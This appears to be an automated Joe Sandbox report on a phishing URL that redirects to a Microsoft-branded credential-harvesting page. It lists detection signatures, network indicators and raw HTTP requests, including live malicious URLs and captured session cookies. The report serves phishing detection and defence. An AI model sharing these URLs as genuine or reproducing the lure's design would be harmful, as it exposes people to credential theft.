Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org

Overview

General Information

Sample URL:https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org
Analysis ID:1427118
Infos:

Detection

HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 1272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1996,i,13394074848288061541,3932029769900024955,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    4.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.orgSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
      Source: https://tvi.jqsn.ru/i8jbs1sy/Virustotal: Detection: 7%Perma Link

      Phishing

      barindex
      Source: Yara matchFile source: 3.4.pages.csv, type: HTML
      Source: Yara matchFile source: 4.5.pages.csv, type: HTML
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJMatcher: Found strong image similarity, brand: MICROSOFT
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJMatcher: Template: microsoft matched
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ#Matcher: Template: microsoft matched
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: Number of links: 0
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://tvi.jqsn.ru/i8jbs1sy/#Xnobody@nobody.orgHTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <meta http-equiv="X-UA-Compatible" c...
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: Title: fbPOjLknKA does not match URL
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: Invalid link: Terms of use
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: Invalid link: Privacy & cookies
      Source: https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.orgSample URL: PII: nobody@nobody.org
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: <input type="password" .../> found
      Source: https://tvi.jqsn.ru/i8jbs1sy/#Xnobody@nobody.orgHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normalHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normalHTTP Parser: No favicon
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: No favicon
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: No <meta name="author".. found
      Source: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 23.63.206.91
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.55.36
      Source: unknownTCP traffic detected without corresponding DNS query: 217.20.55.36
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /dream/mer/7/nobody@nobody.org HTTP/1.1Host: bestohiomortgagerate.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: bestohiomortgagerate.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.orgAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /i8jbs1sy/ HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://bestohiomortgagerate.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tvi.jqsn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tvi.jqsn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/bcc5fb0a8815/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tvi.jqsn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://tvi.jqsn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=875854595e7f53f2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tvi.jqsn.ru/i8jbs1sy/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjdFR0ZSajlLampnQ3R3RmpLbkt3a0E9PSIsInZhbHVlIjoiNDZLaGJoeUhhWGFRZWhkU0VkRlRSa1IrVVVWekdyTm0yMCtHMk8rVVA3d2NzQmZRSlhDalpMTFJFTTZOM1hVZXNKbnJ2T0VGWnNLVkZPcUpaSEtVKzIyYXhTQmhsMzkzM0tqVThVV0tTSURMMDh6VFAxeWwzUW9BeVlnRTlaOTUiLCJtYWMiOiIzNDMzZGY0NmI0MTdhZTIyOTlhYTgzNDNkZjg5NzRkZjk0YjJlMTVhOWU5NjhjMTI4ZmQzODQ4MmM3YjAxNzkxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJTUUhoZ1FnQnFKVS8rRE8vd1lQY1E9PSIsInZhbHVlIjoiREpzT1RGUm5BQ0w3aC9JT1NRcEN5d0dxN2JaOFkya3FFQXJ5T0tlT2pzOGZOYXdVd0daQjBZQzIyL0Q1YkZqbkxGNElVQlpobWlET041V3dqY3hWc3dHMm55UjJJR3ZOR3JaRnl0Vi9KZy9Nb1kybXZMR3pTczdEZWJVZlZFOVEiLCJtYWMiOiIwMjQyNTNjYjFjMzU3YTU0M2Q2MjMwMDNkZDFjMjlkZmU5M2NjZTI1MTE0ZjUxZjQ0NTM2NWJhYjBkYjE0NWFmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/875854595e7f53f2/1713314068893/8waoYsE4nxAn5eo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/875854595e7f53f2/1713314068896/edde83305c606ea0c20efed6626591eb5ff70ccaffa9f8dd87ba107fdd444183/stHfhAVhA9tPb5n HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/875854595e7f53f2/1713314068893/8waoYsE4nxAn5eo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /i8jbs1sy/ HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://tvi.jqsn.ru/i8jbs1sy/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik1nUG1NcGN3SUhpc1VIb1JJNUpRNXc9PSIsInZhbHVlIjoiN2MzeWlKWE51RjUrYWk3MU9yTDJqMjdyc3pCSU9HSmNBU1lNcHlDcTQzVy9tQnE4VHlYOUpicXpKWGRNeWM3UXJnOHJUa3ovMmlNYjFJeE1EMjN5MDlFZURLaFBKM01LVTd2YkhCR3RtK0Q4Y1NoZnNVbGNlTUdGWlB3TmtRYmciLCJtYWMiOiJhNjEwYjAxOTdhMTg2MjZmNDk4NWQwZDUxODczNTY0OTRmMjdiYmYwYWQwMTNhNGI4MzY3ZDI4MTQzZTIyZWZkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBxNUR2dGJpZmxWRERJU1dCa20yM3c9PSIsInZhbHVlIjoiVnlzK1VyeXpUVHNSUE9KYzFLQ0k5Q0VQbzZRdVQzQ0t5NTFId0pObU9XTzVMM3NHTDQ1TEhJSTBPb0pDQm9NQzlETjA4OUhOMXdyMEdQQk5BWVZ6Ulh0OG94Qnk0eXZEbTlyd2FDbWtmUUZSdDZJRnV5QldlYTRoZUsvYytLNWwiLCJtYWMiOiI3ZjgxYzQ5NDAyZGQ1NjBlZDhmZGI0MGI3MDRhZWIxNTYyY2RkOThhMTE5ZGM3ZTRmZDY5MGIxOWU2ZDIzNTE5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /glVuTopMUrrdyu89qRN0N14qAuhvIhKVz2 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik1nUG1NcGN3SUhpc1VIb1JJNUpRNXc9PSIsInZhbHVlIjoiN2MzeWlKWE51RjUrYWk3MU9yTDJqMjdyc3pCSU9HSmNBU1lNcHlDcTQzVy9tQnE4VHlYOUpicXpKWGRNeWM3UXJnOHJUa3ovMmlNYjFJeE1EMjN5MDlFZURLaFBKM01LVTd2YkhCR3RtK0Q4Y1NoZnNVbGNlTUdGWlB3TmtRYmciLCJtYWMiOiJhNjEwYjAxOTdhMTg2MjZmNDk4NWQwZDUxODczNTY0OTRmMjdiYmYwYWQwMTNhNGI4MzY3ZDI4MTQzZTIyZWZkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBxNUR2dGJpZmxWRERJU1dCa20yM3c9PSIsInZhbHVlIjoiVnlzK1VyeXpUVHNSUE9KYzFLQ0k5Q0VQbzZRdVQzQ0t5NTFId0pObU9XTzVMM3NHTDQ1TEhJSTBPb0pDQm9NQzlETjA4OUhOMXdyMEdQQk5BWVZ6Ulh0OG94Qnk0eXZEbTlyd2FDbWtmUUZSdDZJRnV5QldlYTRoZUsvYytLNWwiLCJtYWMiOiI3ZjgxYzQ5NDAyZGQ1NjBlZDhmZGI0MGI3MDRhZWIxNTYyY2RkOThhMTE5ZGM3ZTRmZDY5MGIxOWU2ZDIzNTE5IiwidGFnIjoiIn0%3D
